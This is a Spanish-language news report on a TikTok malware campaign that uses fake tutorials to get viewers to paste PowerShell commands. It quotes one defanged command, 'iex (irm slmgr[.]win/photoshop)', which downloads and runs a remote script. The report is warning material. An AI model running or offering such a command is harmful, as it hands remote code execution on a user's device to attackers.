Una nueva campaña maliciosa fue detectada en TikTok, donde se comparten falsos tutoriales para obtener Windows, Netflix o Photoshop de forma gratuita. Sin embargo, estos videos son una trampa para distribuir malware y robar información personal, según descubrió el experto Xavier Mertens del SANS Internet Storm Center (ISC).
Los atacantes aprovechan la popularidad de esta plataforma de entretenimiento para lanzar estos engaños. Con videos breves y explicaciones sencillas, prometen acceso gratuito a programas y servicios, pero en realidad inducen a las víctimas a ejecutar comandos maliciosos que terminan comprometiendo sus dispositivos.
¿Cómo funciona este fraude en TikTok?
La campaña utiliza una técnica de ingeniería social llamada ClickFix, donde se ofrecen supuestas soluciones a problemas técnicos, según el análisis que se detectó e informó en el portal de Trend Micro desde mayo de este año.
Los usuarios son guiados a ejecutar comandos en PowerShell, la terminal de Windows, con la promesa de desbloquear funciones premium o instalar software completo sin pagar.
Por ejemplo, en un video sobre cómo activar Photoshop, se muestra un comando como: iex (irm slmgr[.]win/photoshop).
Este fragmento de código, lejos de hacer lo que promete, conecta al dispositivo con un servidor remoto para descargar y ejecutar nuevos scripts maliciosos.
